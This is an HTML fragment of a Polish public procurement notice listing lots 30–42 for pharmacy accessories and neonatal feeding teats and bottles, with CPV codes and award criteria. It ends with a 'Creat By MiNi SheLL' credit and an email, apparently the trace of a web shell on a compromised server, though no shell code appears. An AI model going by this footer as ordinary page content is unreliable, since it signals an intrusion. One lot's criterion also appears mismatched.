<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 6:
1	Etykieta samoprzylepna: chronić od światła - szt. 50
2	Etykieta samoprzylepna: przechować w chłodnym miejscu - szt.	500
3	Etykieta samoprzylepna: zmieszać	- szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 7: Filtry jednorazowe sterylne do przesączania kropli  - szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 8: Podkładki pergaminowe  śr.10-12cm	- szt.	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 9: 
1	Opłatki skrobiowe  a 500 szt.    nr  2,3,4	op.	- 5 szt.
2	Opłatki skrobiowe a 500 szt.     nr 5,6	op.	- 12 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 10:
1	Torebka biała z nadrukiem, o poj. 0,5kg	- szt.	300
2	Torebka biała z nadrukiem, o poj. 1kg	- szt.	50
3	Torebka biała z nadrukiem roz. 120 x 170mm	- szt.	50
4	Torebka biała  1kg	- szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 11: 
1	Reklamówki a 1kg -	szt.	1000
2	Reklamówki a 3kg -	szt.	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 12:
Paski testowe chemiczne na  suche gorące powietrze 	- szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin uzupełnienia banku endoprotez i implantów - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 13: Testy biologiczne na suche gorące powietrze	- szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 14: Pudełka na czopki /gałki	- szt.	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 15: Gumki recepturki 	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 16: 
1	Formy do czopków 1g x 300szt.	- op.	5
2	Formy do czopków 2g x 300szt.	- op.	2
3	Formy do gałek 3g x 264szt.	- op.	10
4	Pojemnik  do maści 15/28	- szt.	50
5	Pojemnik  do maści 20/33	- szt.	600
6	Pojemnik  do maści 30/42	- szt.	50
7	Pojemnik  do maści 50/70	- szt.	100
8	Pojemnik  do maści 100/140	- szt.	100
9	Pojemnik  do maści 200/280	- szt.	200
10	Pojemnik  do maści sterylny 50/70	- szt.	200
11	Mieszadła jednorazowe 15/20/30	- szt.	600
12	Mieszadła jednorazowe  50	- szt.	200
13	Mieszadła jednorazowe 100/200	- szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 17: 
1	Cylindry miarowe a 50ml 	- szt.	20
2	Cylindry miarowe a 100ml 	- szt.	20
3	Bagietka szklana (pręcik) grubość 4-5mmm, długość 250-300mm	- szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> Pakiet IX - Dostawa smoczków oraz butelek dla noworodków i wcześniaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Smoczek z termoplastycznego elastomeru, jednorazowego użytku, do karmienia wcześniaków do butelek (poz. nr 4 i 5).	- szt	2 000
2	Smoczek jednorazowego użytku z termoplastycznego elastomeru, do karmienia noworodków do butelek (poz. nr 4 i 5). 	- szt.	8 000
3	Smoczek do karmienia dzieci z rozszczepem podniebienia w zestawie z butelką o poj. 130-150 ml, jałowy, gotowy do użycia. 	- szt	5
4	Butelka jednorazowego użytku do karmienia dzieci, o poj. 50-80 ml - szt.	800
5	Butelka jednorazowego użytku do karmienia dzieci, o poj. 130-150 ml z nakrętką i podziałką 	szt.	240.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.68.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com